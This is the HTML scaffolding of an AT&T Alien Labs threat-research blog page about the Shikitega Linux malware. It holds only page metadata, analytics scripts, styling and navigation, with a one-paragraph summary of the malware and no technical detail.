<!DOCTYPE html>
<html lang="en">

<head>
	

	


	

	<!--trying to figure out the canonical url issue with blogs-->
	<link rel="canonical" href="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux" />

	<title>Shikitega - New stealthy malware targeting Linux | AT&T Alien Labs</title>

	

		

	<meta property="og:site_name" value="AT&T Cybersecurity" />
	<meta property="og:title" content="Shikitega - New stealthy malware targeting Linux" />
	<meta property="og:url" content="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux" />
	<meta property="og:image" content="https://cdn-cybersecurity.att.com/blog-content/Blog-Images/open-graph/malware-red-sphere-open-graph.jpg" />
	<meta property="og:description" content="Executive summary

AT&amp;T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.

Key takeaways:


	The malware downloads and executes the Metasploit&rsquo;" />
		

		<script type="text/javascript" src="https://cybersecurity.att.com/public/dbf330b49b00cc2f496a6233c9dc954522001624dcc5"  ></script><script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=619c04ec1bd25500123c9511&product=inline-share-buttons" async="async"></script>

	<meta charset="utf-8">

<link rel="preconnect" href="https://cdn-cybersecurity.att.com" />
<link rel="preconnect" href="https://www.att.com" />
<link rel="preconnect" href="https://www.googletagmanager.com" crossorigin />
<link rel="preconnect" href="https://cdn.vidyard.com" crossorigin />
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin />
<link rel="preconnect" href="https://www.google-analytics.com" crossorigin />
<link rel="preconnect" href="https://play.vidyard.com" crossorigin />
<link rel="preconnect" href="https://adservice.google.com" crossorigin />
<link rel="preconnect" href="https://www.facebook.com" crossorigin />
<link rel="preconnect" href="https://www.google.com" crossorigin />
<link rel="preconnect" href="https://px.ads.linkedin.com" crossorigin />


<style>.async-hide { opacity: 0 !important} </style>
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
    h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
    (a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
    {'GTM-WGVFC3T':true});</script>
<link rel="preload" as="script" href="https://cybersecurity.att.com/public/dbf330b49b00cc2f496a6233c9dc954522001624dcc5"/><link rel="preload" href="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T" as="script">
<script async src="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T"></script>


<script src="https://cdn-cybersecurity.att.com/js/v2/imports/top-bundle.min.js?v=20220927602681"></script>


<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataDefinition.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataManager.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/marketing.min.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/detm_adobe.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/engage.min.js" as="script">






<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KLJDXJN');</script>
<!-- End Google Tag Manager -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-hdr.js' data-restrictions='target' type='text/javascript'></script>


<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="ahrefs-site-verification" content="a6fa0378625f72f89c6f290c3c7559ffee326fb9232cd87fcace798afce3e30d">
<meta name="google-site-verification" content="GTQZz4AGa47UtmP64oC5BB735pkyncjtISHOcQZbIho" />
<meta name="google-site-verification" content="dOSpKecfL6OVRkgr2KvddmhD-l-g3x8vlru1kmbqa9M" />

<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/zero-width.ttf" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Bold.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Regular.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Light.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Medium.woff2" />


<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-LightItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-BoldItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-MediumItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Italic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Black.woff2" />

<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/css/fonts/glyphicons-halflings-regular.woff2" />
<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/av-icons.ttf?e81fxl" />



<link rel="preload" as="style" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20220927602681" />
<link rel="apple-touch-icon" sizes="144x144" href="https://cdn-cybersecurity.att.com/images/uploads/apple-touch-icon.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico"/>
<link rel="shortcut icon" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico">
<link rel="manifest" href="https://cdn-cybersecurity.att.com/manifest.json">

<link rel="stylesheet" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20220927602681" />





<script type="text/javascript">
  	var sc = document.createElement("script");
	sc.setAttribute("src", "https://www.att.com/scripts/adobe/virtual/detm-container-hdr.js");
	sc.setAttribute("type", "text/javascript");
	document.head.appendChild(sc);  
</script>


<script>
	var customAdobeTrackingPageLoadObj = {};
	if (typeof ddo !== "undefined") {initAdobePageTrackingHeader();}
	function adobeVideoCommenceVidyard(player) {
		var commenceEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Commence', commenceEvent);
		}
	}
	function adobeVideoUpdateVidyard(player) {
		var updateEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds,
			videoLengthViewed: Math.floor(player.status.currentTime),
			videoProgressPercent: Math.ceil((player.status.currentTime / player.metadata.length_in_seconds) * 100)
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Update', updateEvent);
		}
	}

	function initAdobePageTrackingHeader() {
		ddo.disableAutoPageLoad();
		document.addEventListener('click', function (event) {
			var target = event.target;
			if (!target.href || !target.text) { return true; }
			var linkEvent = {
				slotFriendlyName: "link-click",
				contentFriendlyName: "Link Click",
				mediaCategory: "Security"
			};
			linkEvent.linkName = target.text;
			linkEvent.linkDestinationUrl = target.href;
			if (target.href.indexOf('#watch-') >= 0) {
				linkEvent.slotFriendlyName = 'watch-video';
				linkEvent.contentFriendlyName = 'Watch Video';
				linkEvent.linkName = 'Watch Video';
			}
			ddo.pushEvent("linkClick", "Link_Click", linkEvent);
		});
		
		customAdobeTrackingPageLoadObj['page.location.url'] = '/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux';


		
		
		    customAdobeTrackingPageLoadObj['page.category.siteSubSection1'] = 'blogs';
		


		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection2'] = 'labs-research';
		



		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection3'] = 'shikitega-new-stealthy-malware-targeting-linux';
		


		
		

		
		


		
			customAdobeTrackingPageLoadObj['page.media.objective'] = 'Awareness';
		

		
	}
</script>


<script type="text/javascript">
    var _elqQ = _elqQ || [];
    _elqQ.push(['elqSetSiteId', '1086385399']);

    _elqQ.push(['elqUseFirstPartyCookie', 'cyber-tracking.att.com']);

    _elqQ.push(['elqTrackPageView', window.location.href]);

    (function () {
        function async_load() {
            var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true;
            s.src = '//img03.en25.com/i/elqCfg.min.js';
            var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x);
        }
        if (window.addEventListener) window.addEventListener('DOMContentLoaded', async_load, false);
        else if (window.attachEvent) window.attachEvent('onload', async_load);
    })();
</script>


	<link rel="alternate" type="application/rss+xml" title="AlienVault Open Threat Exchange Blog" href="/site/blog-all-rss" />

	<style>


	.section-breadcrumb ol {
    margin-top: 0px !important;
    margin-bottom: 10px;
	}

	.flexible-layout .section-breadcrumb ol li a,
	.flexible-layout .section-breadcrumb ol li{
    	color: #000;
    	font-size: 12px;
	}

	.section-breadcrumb .glyphicon {
    font-size: 10px;
    line-height: 10px;
    font-weight: 300;
    color: #000!important;
	}

	.blog-author-info {
		width: 70%;
		float: left;
		color: #191919;
	}

	.blog-subscribe-grid ul {
		margin-left: 0px;
		margin-bottom: 0px;
		padding-left: 0px;
	}

	.blog-subscribe-grid ul li {
		list-style-type: none;
		line-height: 20px;
	}

	.blog-subscribe-grid ul li a {
		color: #c6ced5;
		font-size: 14px;
		text-decoration: none;
	}

	.blog-subscribe-grid ul li a:hover {
		text-decoration: underline;
	}

	.blog-content-area img {
		width: 100%!important;
		height: auto!important;
	}

	.blog-promo-item {
		clear: both;
		overflow: hidden;
		margin-bottom: 30px;
	}
	.promo-block .small {
		text-transform: uppercase;
	}

	.blog-promo-item-text {
		width: 345px;
		float: left;
		max-width:100%;
	}

	.blog-promo-item p {
		margin-bottom: 0px!important;
	}






	#blog-promo-block {
		padding-top: 20px;
	}



	/*promo block and sticky classes*/

	.sticky-sidebar {
		top: 147px;
		position: -webkit-sticky; /* Safari */
		position: sticky;
	}
	     .sidebar-search {
			 margin-bottom: 30px;
		 }

         .sidebar-search .search-button {
                width: 100%;
                position: relative;
            }

            .sidebar-search .search-button input {
                padding: 0px;
                margin: 2px 0px 0px 0px;
                position: absolute;
                background: url(https://cdn-cybersecurity.att.com/images/icn-sidebar-search.png) top left no-repeat;
                background-size: 25px 25px;
                width: 25px;
                height: 25px;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                left: 10px;
                top: 6px;
             }

			.sidebar-search .search-field input {
                border: 0;
                width: 100%;
                height: 30px;
                padding-left: 50px;
				margin-top: 5px;
            }

            .sidebar-search .search-field {
                border: 1px solid #CCCCCC;
                width: 100%;
                height: 40px;
            }

            #q::placeholder {
          		color: #767676!important;
            }

            #blog-subscribe-box {
			height:auto;
            padding: 32px;
            background-image: url('https://cdn-cybersecurity.att.com/images/uploads/backgrounds/blog-email-subscribe-bkg.jpg');
            background-size: cover;
            }

            #blog-subscribe-box h2 {
            color: #fff;
            font-size:32px;
            }

			#blog-subscribe-box p {
				margin-bottom: 10px;
			}






	@media (max-width: 991px) {
            .sidebar-search .search-button input {
                padding: 0px;
                background: transparent;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                right: 5px;
                top: 5px;
                padding-left: 0px;
             }

            .sidebar-search .search-field input {
             padding-left: 15px;
             }


            }

            	@media (min-width: 768px) and (max-width: 920px){
	.blog-subscribe-grid .btn {
		border-radius: 24px;
	    font-size: 12px;
	    line-height: 18px;
	    border: none;
	    padding: 6px 36px;
	    height: 30px;
	    font-weight: 500;
	}
}


		.blog-content-area p,
		.blog-content-area ul li,
		.blog-content-area ol li{
			font-size: 16px;
			line-height: 20px;
			font-weight: 400;
		}
		.blog-content-area ul li,
		.blog-content-area ol li {
			margin-bottom: 10px;
		}

		.blog-content-area {
		margin-top: 30px;
		}

		.flexible-layout .section-breadcrumb {
		margin-bottom: 30px;
		}

		.blog-detail h1 {
    		color: #000;
			background: transparent;
    		padding: 0px;
		}

		.blog-title-date-author-area {
			padding-bottom: 20px;
			border-bottom: #959595 1px solid;
		}

		.blog-body {
		padding-top: 20px;
		}


		.blog-detail .blog-categories {
    background-color: transparent;
    border-bottom: 1px solid #959595;
    border-top: 1px solid #959595;
    padding: 20px 0px 20px 0px;
    color: #000;
    margin: 30px 0px;
    font-size: 16px;
    line-height: 24px;
	font-weight: 400;
	}

	.blog-detail .blog-categories a {
	font-weight: 400;
	}

	.blog-share {
	margin-top: 60px;
	text-align: center;
	margin-bottom: 60px;
	}

	.blog-listing-social {
		display: block;
	}

	#st-1 .st-btn {
	  border-radius: 25px!important;
	  border: none;
	  cursor: pointer;
	  display: inline-block;
	  font-size: 12px;
	  height: 45px!important;
	  line-height: 40px!important;
	  margin-right: 8px;
	  padding: 0 10px;
	  position: relative;
	  text-align: center;
	  top: 0;
	  vertical-align: top;
	  white-space: nowrap;
	  margin-right: 20px!important;
	}

	#st-1 .st-btn > img {
	  display: inline-block;
	  height: 25px!important;
	  width: 25px!important;
	  position: relative;
	  top: 10px;
	  vertical-align: top;
	  }

	  #st-1 .st-btn[data-network='email'] {
	  	background-color: #e0752d!important;
	  }

	  .st-first {
	  	margin-left: 20px!important;
	  }

	</style>

</head>

	<body class="listing-blog-entry-id-7865">
			<!-- Google Tag Manager (noscript) -->
<noscript><iframe src='https://www.googletagmanager.com/ns.html?id=GTM-KLJDXJN'
height='0' width='0' style='display:none;visibility:hidden'></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-ftr.js' type='text/javascript'></script>


		<header id="header" class="navbar navbar-fixed-top">

	<style>
@media (max-width: 543px) {
	.hide-on-mobile {
		display: none;
	}
}
</style>

<div id="news-banner">
    <div class="container-fluid">
        <div class="row vcenter">
            <div class="col-sm-12">

                <div id="news-headline-link">
					<a href="/products/strategy-and-roadmap/sase-readiness" class="text-white">
						Start your SASE readiness consultation today.
						<span class="hide-on-mobile">Learn more</span> &LongRightArrow;
					</a>
                </div>
				<div id="search-contact">
					<ul class="list-unstyled header_nav_top_list">
						<li class="header_nav_top_list_item"><a id="top-nav-support" href="/support">Support</a></li>
						<li class="header_nav_top_list_item"><a id="top-nav-contact" href="/contact">Contact</a></li>
						<li class="header_nav_top_list_item search">
							<form action="/search-results" method="get" id="top-search-form" __bizdiag="113" __biza="WJ__"><input name="q" id="top-search-form-text" type="text" placeholder="Search" aria-label="Search"><button type="submit"><span class="glyphicon glyphicon-search"></span></button></form>

						</li>
					</ul>
				</div>
            </div>
        </div>
    </div>
</div>






	<div id="header-container" class="container-fluid">
		<div id="header-logo">
			<div class="logo-globe"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-globe.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-business"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-business-web.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-cybersecurity"><a href="/"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-cybersecurity-web.svg" alt="AT&amp;T Cybersecurity" /></a></div>
		</div>

		<button type="button" class="header_toggle_nav navbar-toggle collapsed" data-toggle="collapse" data-target="#header-nav" aria-expanded="false">
			<span class="sr-only">Toggle navigation</span>
			<span class="avicon avicon-bars"></span>
			<span class="avicon avicon-close"></span>
		</button>
		
		
			<a href="/contact" id="header-cta" class="hidden-md hidden-lg btn btn-blue btn-sm">Contact us</a>
		

		<nav class="navbar-collapse collapse" id="header-nav">
			<ul class="nav navbar-nav list-unstyled">
				<li class="nav-item mobile-search visible-sm visible-xs">
					<form action="/search-results" method="get" id="mobile-search-form" __bizdiag="113" __biza="WJ__"><input name="q" id="mobile-search-form-text" type="text" placeholder="Search" aria-label="Search"><button type="submit"><span class="glyphicon glyphicon-search"></span></button></form>
				</li>
				<li class="nav-item has-dd products">
					<a id="main-nav-products" href="/products" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#products-dd">Products<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span>
					</a>
					<div class="nav-dropdown collapse" id="products-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav">
									<li id="first-sub-cyber-strategy-risk"><a href="/categories/cybersecurity-consulting-services" class="first-level">Cybersecurity Consulting Services</a>
										<div class="desktop-subnav open">
											<ul class="list-unstyled">
												<li class="second-sub-heading">Cyber Strategy</li>
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>

												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Risk and Compliance</li>
												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Vulnerability and Threat Management</li>
												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>
												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">CSO Advisory Services</li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>
												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>

												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>

												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>

												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
									</li>
                                    <li id="first-sub-managed-security-services"><a href="/categories/managed-security-services" class="first-level">Managed Security Services</a>
                                        <div class="desktop-subnav">
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Network Security</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/categories/network-security">View All</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Threat Detection</li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Endpoint Security</li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>

                                        </div>
                                        <div class="mobile-subnav">
                                            <ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>
                                        </div>
                                    </li>
									<li id="first-sub-network-security"><a href="/categories/network-security" class="first-level">Network Security</a>
										<div class="desktop-subnav">
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/secure-workforce-with-check-point">Secure Workforce with Check Point</a></li>

												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall-express-with-check-point">Premises-Based Firewall Express with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&T Application Layer Security</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-heading">AT&T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/secure-workforce-with-check-point">Secure Workforce with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall-express-with-check-point">Premises-Based Firewall Express with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>

												<li class="second-sub-heading">AT&T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&T Application Layer Security</a></li>
											</ul>
										</div>
									</li>
									<li id="first-sub-unified-endpoint"><a href="/categories/endpoint-security" class="first-level">Endpoint Security</a>
										<div class="desktop-subnav">
											<ul class="list-unstyled">
												<li class="second-sub-heading">Endpoint Security</li>
												<li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
												<li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
												<li class="second-sub-link"><a href="/products/vmware">VMware Workspace ONE®</a></li>
												<li class="second-sub-link"><a href="/products/ibm-maas360">IBM MaaS360</a></li>
												<li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
												<li class="second-sub-link"><a href="/products/mcafee-endpoint-protection">McAfee Endpoint Protection</a></li>
												<li class="second-sub-link"><a href="/products/samsung-knox-manage">Samsung Knox</a></li>

											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
													<li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
													<li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
													<li class="second-sub-link"><a href="/products/vmware">VMware Workspace ONE®</a></li>
													<li class="second-sub-link"><a href="/products/ibm-maas360">IBM MaaS360</a></li>
													<li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
													<li class="second-sub-link"><a href="/products/mcafee-endpoint-protection">McAfee Endpoint Protection</a></li>
													<li class="second-sub-link"><a href="/products/samsung-knox-manage">Samsung Knox</a></li>

											</ul>
										</div>
									</li>
									<li id="first-sub-threat-detection-response"><a href="/categories/threat-detection-and-response" class="first-level">Threat Detection and Response</a>
										<div class="desktop-subnav">

											<ul class="list-unstyled sub-nav">
												<li class="second-sub-heading">AT&T Threat Solutions</li>
												<li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
												<li class="second-sub-link"><a href="/products/threat-detection-and-responses-for-government">Threat Detection and Response for Government</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere">USM Anywhere</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere-advisors">USM Anywhere Advisors</a></li>
												<li class="second-sub-link"><a href="/products/usm-for-mssp">XDR for MSSPs</a></li>
											</ul>

											<div id="products-tdr-menu-image">
												<a href="/alien-labs">
													<img src="https://cdn-cybersecurity.att.com/images/uploads/icons/alien-labs.svg" alt="">
													<p >Powered by<br>AT&amp;T Alien Labs</p>
												</a>
											</div>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">

												<li class="second-sub-heading">AT&T Threat Solutions</li>
												<li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
												<li class="second-sub-link"><a href="/products/threat-detection-and-responses-for-government">Threat Detection and Response for Government</a></li>

												<li class="second-sub-link"><a href="/products/usm-anywhere">USM Anywhere</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere-advisors">USM Anywhere Advisors</a></li>
												<li class="second-sub-link"><a href="/products/usm-for-mssp">XDR for MSSPs</a></li>

												</ul>
										</div>
									</li>

							</ul>
						</div>
						<!--<div class="dd-bottom visible-lg" id="view-all-products">
							<div class="container-fluid">
								<a href="/products">
									<span class="view-all-text">View All Products &LongRightArrow;</span>
								</a>
							</div>
						</div>-->
					</div>
				</li>
				<li class="nav-item has-dd solutions">
					<a id="main-nav-solutions" href="/solutions" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#solutions-dd">Solutions<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="solutions-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-see-all-solutions-mobile" href="/solutions" class="header_nav_link">See All Solutions</a></li>
							</ul>
							<div id="compliance">
								<div class="menu-header">Compliance</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/it-compliance-management">Overview</a></li>
									<li><a href="/solutions/gdpr-compliance">GDPR</a></li>
									<li><a href="/solutions/hipaa-compliance">HIPAA</a></li>
									<li><a href="/solutions/iso-27001-compliance">ISO 27001</a></li>
									<li><a href="/solutions/pci-dss-compliance">PCI DSS</a></li>
									<li><a href="/solutions/soc-2-compliance">SOC 2</a></li>
								</ul>
							</div>
							<div id="industry">
								<div class="menu-header">Industry</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/education">Education</a></li>
									<li><a href="/solutions/energy-sector-security">Energy Sector</a></li>
									<li><a href="/solutions/government">Federal</a></li>
									<li><a href="/solutions/financial-services">Financial Services</a></li>
									<li><a href="/solutions/healthcare">Healthcare</a></li>
									<li><a href="/solutions/manufacturing">Manufacturing</a></li>
									<li><a href="/partners/mssp-program">MSSPs</a></li>
									<li><a href="/solutions/retail">Retail</a></li>
								</ul>
							</div>
							<div id="environment">
								<div class="menu-header">Environment</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/5g-security-solutions">5G</a></li>
									<li><a href="/solutions/aws-security-and-compliance-management">AWS</a></li>
									<li><a href="/solutions/azure-security-and-compliance-management">Azure</a></li>
									<li><a href="/solutions/cloud-security">Cloud</a></li>
									<li><a href="/solutions/iot-and-mobility-security">IOT/Mobility</a></li>
									<li><a href="/solutions/hybrid-cloud-security">Hybrid</a></li>
									<li><a href="/solutions/network-security">Network</a></li>
									<li><a href="/solutions/remote-workforce-security">Remote Workforce</a></li>

								</ul>
							</div>
							<div id="core-capabilities">
